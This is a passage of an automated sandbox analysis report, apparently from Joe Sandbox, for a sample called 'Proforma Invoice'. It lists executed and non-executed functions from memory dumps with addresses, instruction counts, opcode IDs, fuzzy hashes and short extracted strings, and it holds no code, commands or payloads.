                                                                                                    Function 00E7D1D4 Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415652042.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e7d000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: da1f09cfa2157beda02056e3490658fe60fa15370817e74c8e75e625ce9b3523
                                                                                                    • Instruction ID: 5873c9941e8526e9f8fb5288fa0574069783a2bd2aa0431f01a8db1f7c302abf
                                                                                                    • Opcode Fuzzy Hash: da1f09cfa2157beda02056e3490658fe60fa15370817e74c8e75e625ce9b3523
                                                                                                    • Instruction Fuzzy Hash: D721D3715082809FDB01DF50D9C0B26BB75FF84318F24C5A9E9496B256C336D857CA61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E7D01C Relevance: .1, Instructions: 72COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415652042.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e7d000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e1f2140cdbd90224064b232e1e14957ca653faea5761f78b0e04933aff786508
                                                                                                    • Instruction ID: 3b839ada826f838b08bc2dd03cf564aefd75a7ee88b74bb4b01ac12802d2ddb6
                                                                                                    • Opcode Fuzzy Hash: e1f2140cdbd90224064b232e1e14957ca653faea5761f78b0e04933aff786508
                                                                                                    • Instruction Fuzzy Hash: 5521D075508240DFCB14DF20D9C0B26BB76FF84318F24D9A9E90E5B246C336D857CA61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E7D005 Relevance: .1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415652042.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e7d000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6169a9f5e5154138bd710897337c028e8f47fd46b5cb4f0fb87114d1f2d90653
                                                                                                    • Instruction ID: 07f62be44c819da6d24a712c0a9e2e4170963b571a4c21031891366beeb38b0d
                                                                                                    • Opcode Fuzzy Hash: 6169a9f5e5154138bd710897337c028e8f47fd46b5cb4f0fb87114d1f2d90653
                                                                                                    • Instruction Fuzzy Hash: 69217F7550D3808FCB02CF20D990B15BF71EF46214F28C5EAD8498B697C33A985ACB62
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E6D4BF Relevance: .1, Instructions: 56COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415605869.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e6d000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f69d7024cdfcefd926ead02efcbb901b97aad1906707df055ccf3b322d20e9c3
                                                                                                    • Instruction ID: bc6cbef03c04565937c153e34ef2f6a2a7198ea4c1f9b3d3ef2b4fe502cfb1c8
                                                                                                    • Opcode Fuzzy Hash: f69d7024cdfcefd926ead02efcbb901b97aad1906707df055ccf3b322d20e9c3
                                                                                                    • Instruction Fuzzy Hash: CD110876948280CFCF11CF10E9C4B16BF71FB84328F28C6A9D8455B656C336D866CBA1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E7D1CF Relevance: .1, Instructions: 53COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415652042.0000000000E7D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E7D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e7d000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: e260aa7d4eec5616febf4142ed0a95566a9e8ae1fbabd20c8ce5c2b41f68a8cc
                                                                                                    • Instruction ID: bd82778cc2b2a4876b18f2f70d1f7668bc9d9509c95e01c2ec9b2c9bb2c7edac
                                                                                                    • Opcode Fuzzy Hash: e260aa7d4eec5616febf4142ed0a95566a9e8ae1fbabd20c8ce5c2b41f68a8cc
                                                                                                    • Instruction Fuzzy Hash: 18118B75908280DFCB11CF50D9C4B15BBB1FF84328F28C6A9D8495B666C33AD85BCB61
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E6D651 Relevance: .0, Instructions: 45COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415605869.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e6d000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a1461d0cbe32b05da44dccc9ce5bcf354a0506150ca943d646954bde762e7424
                                                                                                    • Instruction ID: 77a152d644e469321d4445f4c6862fcd451d54dfd9f6de6ae6da239d8f695c55
                                                                                                    • Opcode Fuzzy Hash: a1461d0cbe32b05da44dccc9ce5bcf354a0506150ca943d646954bde762e7424
                                                                                                    • Instruction Fuzzy Hash: 5E01F77194C3449AE7108A11DC847AABB98EF413B8F18841AED486B242C379D840CAB2
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00E6D650 Relevance: .0, Instructions: 36COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.415605869.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_e6d000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: fa5cf111457c5592fdd0a5b744b2d45e84e5a775094dbf6becc1df36425b8153
                                                                                                    • Instruction ID: 9d7e13d8afad26d893ae69d945531798bfa9fab6c7501cc5a02e0a4759cf54c8
                                                                                                    • Opcode Fuzzy Hash: fa5cf111457c5592fdd0a5b744b2d45e84e5a775094dbf6becc1df36425b8153
                                                                                                    • Instruction Fuzzy Hash: 7FF096729083449EEB108A15DDC4B67FFD8EB51778F18C45AED485F286C3799C44CAB1
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053FFBB0 Relevance: .0, Instructions: 20COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 68dd066efccdef2cae6fb2b941d44568bd157469e8fcd02b2c2e931ebae7caa9
                                                                                                    • Instruction ID: 4abdb7a81dfdc1218894e16c57d22c59df22690b44dec7d98770842627c7f02b
                                                                                                    • Opcode Fuzzy Hash: 68dd066efccdef2cae6fb2b941d44568bd157469e8fcd02b2c2e931ebae7caa9
                                                                                                    • Instruction Fuzzy Hash: C4E0C27180920CEFC700DFB0E4946EE77FDEB0A305F1014A6960683110EB310E14C791
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Non-executed Functions

                                                                                                    Function 053F5C18 Relevance: 2.7, Strings: 2, Instructions: 162COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: W$*c
                                                                                                    • API String ID: 0-3557142924
                                                                                                    • Opcode ID: e5a90b5322df59fd62abf8f593f2d45e5645956c246aa2f113605f61ffe282b0
                                                                                                    • Instruction ID: ddc59077bc2b9c6fdf3303776f74a058aa0a952186ca0d15a9ddb9eddc236c00
                                                                                                    • Opcode Fuzzy Hash: e5a90b5322df59fd62abf8f593f2d45e5645956c246aa2f113605f61ffe282b0
                                                                                                    • Instruction Fuzzy Hash: F771F2B4E0520A9FCB04CF99D5809AEFBF2BF48314F188519D51AAB614D730AA42CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F5C0A Relevance: 2.7, Strings: 2, Instructions: 155COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: W$*c
                                                                                                    • API String ID: 0-3557142924
                                                                                                    • Opcode ID: 01893d10785ea51d86b0155e88d56ba031a639c834025b65fbdff3608cff632c
                                                                                                    • Instruction ID: 5866bd80ad14cd1d9171058e63858ff5d5f3ad63c739dd1857cde7bdc924e827
                                                                                                    • Opcode Fuzzy Hash: 01893d10785ea51d86b0155e88d56ba031a639c834025b65fbdff3608cff632c
                                                                                                    • Instruction Fuzzy Hash: 2661F574E1624A9FCB04CFA9C5809AEFBF2FF48314F188516D51AAB714D730AA42CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F5FC0 Relevance: 2.6, Strings: 2, Instructions: 108COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 022M$022M
                                                                                                    • API String ID: 0-2238841970
                                                                                                    • Opcode ID: d40e320c8d265f0606a06ce1995871db2fe30eaf0acbe62d794f963b9be1cfc6
                                                                                                    • Instruction ID: de00d99f476d2b81f1dc919b660b5554bb0a0910023de92b0274c08dcecb774a
                                                                                                    • Opcode Fuzzy Hash: d40e320c8d265f0606a06ce1995871db2fe30eaf0acbe62d794f963b9be1cfc6
                                                                                                    • Instruction Fuzzy Hash: 5C411C70D1820A9FCB04CFAAC5815AEFBF2FF89300F24C46AD515A7655D7349A42CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F5FD0 Relevance: 2.6, Strings: 2, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 022M$022M
                                                                                                    • API String ID: 0-2238841970
                                                                                                    • Opcode ID: 82b33a13bb808306d5a33bbc2b6d73c51c055220690ca2d0a35aa4d86869bbea
                                                                                                    • Instruction ID: f1a5dfaa11b52f9ae06f9b084cf0424b2e2788802234b7a74fb6992af96d266f
                                                                                                    • Opcode Fuzzy Hash: 82b33a13bb808306d5a33bbc2b6d73c51c055220690ca2d0a35aa4d86869bbea
                                                                                                    • Instruction Fuzzy Hash: CF41E670E1420A9BCB04CFAAC5815AEFBF6BF88300F24C46AD616B7615D7349A41CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F3DA8 Relevance: 1.6, Strings: 1, Instructions: 302COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: -nqj
                                                                                                    • API String ID: 0-2853604900
                                                                                                    • Opcode ID: bc8faaac6e6b4ca773e24fbc43255c8d8db1df1a5f8312c57f41f1c8875fc6af
                                                                                                    • Instruction ID: 2d94ecf7c1c268bb149499ae3461075fd5ba44c2f58fd8c995391914d5d20984
                                                                                                    • Opcode Fuzzy Hash: bc8faaac6e6b4ca773e24fbc43255c8d8db1df1a5f8312c57f41f1c8875fc6af
                                                                                                    • Instruction Fuzzy Hash: 81D14CB4E1420ADFCB04CF95C4858AEFBB6FF99301F14C959D516AB264D734AA82CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F3D9A Relevance: 1.5, Strings: 1, Instructions: 297COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: -nqj
                                                                                                    • API String ID: 0-2853604900
                                                                                                    • Opcode ID: 27116106f5ede689ea04898c33a3a2b679fa390e021de8511b71f9f933230e17
                                                                                                    • Instruction ID: 7f75816edd466c1f51785f6bd4603871ff19e55648025163679eb1e78f1a48e2
                                                                                                    • Opcode Fuzzy Hash: 27116106f5ede689ea04898c33a3a2b679fa390e021de8511b71f9f933230e17
                                                                                                    • Instruction Fuzzy Hash: 5ED14B75E1420ADFCB04CFA5C4858AEFBB7FF89300B14C955D516AB268D734AA82CF90
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F1C07 Relevance: 1.5, Strings: 1, Instructions: 262COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: X"v
                                                                                                    • API String ID: 0-1462037591
                                                                                                    • Opcode ID: 0c7bb7d0af3bbe9d068a72e38cbe1f8974742d201631813507c47ca7f93a1503
                                                                                                    • Instruction ID: 180b42eb8d5e6b76c0a44db12388c340022d13b1e3a51526d0e3fa1d7c99cac4
                                                                                                    • Opcode Fuzzy Hash: 0c7bb7d0af3bbe9d068a72e38cbe1f8974742d201631813507c47ca7f93a1503
                                                                                                    • Instruction Fuzzy Hash: 83B13575E04649CFCB04CFA9D985ADEBBB2EF89300F18812AD509AB364D7309946CF60
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F2550 Relevance: 1.4, Strings: 1, Instructions: 155COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Mc?Q
                                                                                                    • API String ID: 0-1176068571
                                                                                                    • Opcode ID: 68c6a94265dcda5939c9c9a0b2a4d45a15428200c55ec1b5f32d8e9ea9223bae
                                                                                                    • Instruction ID: 60a63da1dec27f4ceca34d2e035bc7c3a8c4bbdd40547646ddbe5038a1de7d5d
                                                                                                    • Opcode Fuzzy Hash: 68c6a94265dcda5939c9c9a0b2a4d45a15428200c55ec1b5f32d8e9ea9223bae
                                                                                                    • Instruction Fuzzy Hash: D651F874E09209DFDB08CF9AD9516AEFBF3EB88300F14D42AE519AB254D7349A418F94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F2540 Relevance: 1.4, Strings: 1, Instructions: 154COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: Mc?Q
                                                                                                    • API String ID: 0-1176068571
                                                                                                    • Opcode ID: f28250eb167b6dfe0d0b933b374f0842d62e90b22f53d7b3cb82529ee889c41b
                                                                                                    • Instruction ID: 60b6df2e5df7203752096b77123b489b305a3f7532e4f5dac9dcfe87da08e63a
                                                                                                    • Opcode Fuzzy Hash: f28250eb167b6dfe0d0b933b374f0842d62e90b22f53d7b3cb82529ee889c41b
                                                                                                    • Instruction Fuzzy Hash: 33510A74E0520ADFDB08CFAAD9515AFFBF3EB88300F14D42AE519AB254D7349A418F54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F55F8 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L;p
                                                                                                    • API String ID: 0-1047063510
                                                                                                    • Opcode ID: b4e6d8c8d5f82f364eebd7bd30d33c01a8b9c2b954824150c501fb378a464070
                                                                                                    • Instruction ID: 7cf1b628cba1d1c044baaf9ece181295de8e4e38dd4fb002b7b022293d0c3c63
                                                                                                    • Opcode Fuzzy Hash: b4e6d8c8d5f82f364eebd7bd30d33c01a8b9c2b954824150c501fb378a464070
                                                                                                    • Instruction Fuzzy Hash: 486107B0E14209DFCB04CFAAD5819AEFBF6BF88304F14906AD525BB254D7349A45CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F55E8 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: L;p
                                                                                                    • API String ID: 0-1047063510
                                                                                                    • Opcode ID: 39b79176fbbab45e1d2bab32ada7d5c5377fe083c73811a6c9c7012322493c41
                                                                                                    • Instruction ID: b336940226a04f164b789c9129e7396c61e887cefb85bd3401bcc31f7ceec101
                                                                                                    • Opcode Fuzzy Hash: 39b79176fbbab45e1d2bab32ada7d5c5377fe083c73811a6c9c7012322493c41
                                                                                                    • Instruction Fuzzy Hash: E8512970E14209DFCB04CFAAD5819AEFBF6BF89300F14906AD525EB254E7349A46CF94
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F8404 Relevance: .4, Instructions: 351COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b87137a3c87e19801c91fd4fa4f142a9df5c9e346624bff4a9b72bed36405fb6
                                                                                                    • Instruction ID: d94ee6f7f81657676216ebd82fd923c063571effe8f2eb6665d716614d20f6fc
                                                                                                    • Opcode Fuzzy Hash: b87137a3c87e19801c91fd4fa4f142a9df5c9e346624bff4a9b72bed36405fb6
                                                                                                    • Instruction Fuzzy Hash: 33D15B72E04219DFCF18CFA6D9846AEFBB6FF89300F14952AD515AB254DB349902CF40
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F9230 Relevance: .3, Instructions: 262COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a260a27af1ff00f3fe1c154910c324cbb07baca51aa91fb2d6bce1adea060cf2
                                                                                                    • Instruction ID: 56fb9869c375dc7d1d254b452766ef320dafa3cb38eb16983caa35bff9536d3a
                                                                                                    • Opcode Fuzzy Hash: a260a27af1ff00f3fe1c154910c324cbb07baca51aa91fb2d6bce1adea060cf2
                                                                                                    • Instruction Fuzzy Hash: ECB12772D1421DEFCB18CFA6D981A9EFBB6FF89300F14942AD515A7264DB359902CF04
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F1CB0 Relevance: .2, Instructions: 207COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 63db5e3d68b0ceaf33cc517c5f7161943d801e91b41b9bd372d450ee3ff055bd
                                                                                                    • Instruction ID: dc363bc28b85274f48f88a7a7ef4b84024aeb8a295d1691cd09227f7d6ec374b
                                                                                                    • Opcode Fuzzy Hash: 63db5e3d68b0ceaf33cc517c5f7161943d801e91b41b9bd372d450ee3ff055bd
                                                                                                    • Instruction Fuzzy Hash: 7F91D270E04609CFDB08CFE9D984AAEFBB2AF89300F14912AD519BB364D7349946CF54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F4D18 Relevance: .2, Instructions: 190COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f0656e8676aa6990417ab0c8c633654c6c70caa2890b68f9350784b91e0cc7d2
                                                                                                    • Instruction ID: 3dc20d16c08f45c7cce54633d57572b8a2a43a1f3d9f24628f2528cf7e17c191
                                                                                                    • Opcode Fuzzy Hash: f0656e8676aa6990417ab0c8c633654c6c70caa2890b68f9350784b91e0cc7d2
                                                                                                    • Instruction Fuzzy Hash: 7181E074A14209DFCB54CFA9D5849AEFBF2FF88310F14955AE519AB225D330AA42CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F4D08 Relevance: .2, Instructions: 188COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4605984ea37c8a35d8316f3ecab4bf55ce8a1f8e3aee72bf42a384429eafb549
                                                                                                    • Instruction ID: bad6b4e1690b1bf75563576fde00698f260686fcb6b284c2263d9c53ec538ea0
                                                                                                    • Opcode Fuzzy Hash: 4605984ea37c8a35d8316f3ecab4bf55ce8a1f8e3aee72bf42a384429eafb549
                                                                                                    • Instruction Fuzzy Hash: B081E074E14209CFCB44CFA9C5859AEFBF2FF88310F24956AE515AB265D334AA42CF50
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F6170 Relevance: .2, Instructions: 173COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a2a32515f88f41fb2383686d9c9afdb0f3e98f83b54cda577631be5f4665835a
                                                                                                    • Instruction ID: 0b7b0a101cefc42d6a02b8f517864996b03c907d3324842324c6572524449a6a
                                                                                                    • Opcode Fuzzy Hash: a2a32515f88f41fb2383686d9c9afdb0f3e98f83b54cda577631be5f4665835a
                                                                                                    • Instruction Fuzzy Hash: 5B71F570E15209DFCF08CFAAD5828EEFBF6EF89310F24952AD515B7214D7349A418B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F6160 Relevance: .2, Instructions: 170COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: ae3612c21b05dd1d2e83129df4327addb97f40224e226691e4b81e7434f3b387
                                                                                                    • Instruction ID: dae331678e2b3fa1c812203612c1864ae6b03e34369eb660af23601e93309fa6
                                                                                                    • Opcode Fuzzy Hash: ae3612c21b05dd1d2e83129df4327addb97f40224e226691e4b81e7434f3b387
                                                                                                    • Instruction Fuzzy Hash: BD711574E15209DFCF08CFA9D9829EEFBF2EF88310F24942AD505B7224D7349A418B64
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 053F7296 Relevance: .1, Instructions: 86COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.423093860.00000000053F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053F0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_53f0000_Proforma Invoice.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 398e7646fd765f65fe66270dd470c219a3fc7a97ab9eba72528a7c58a736e451
                                                                                                    • Instruction ID: 526b95a0332da8fff61ba743d3ef28bf5a36b62319e57459e1f41fe804f95f3b
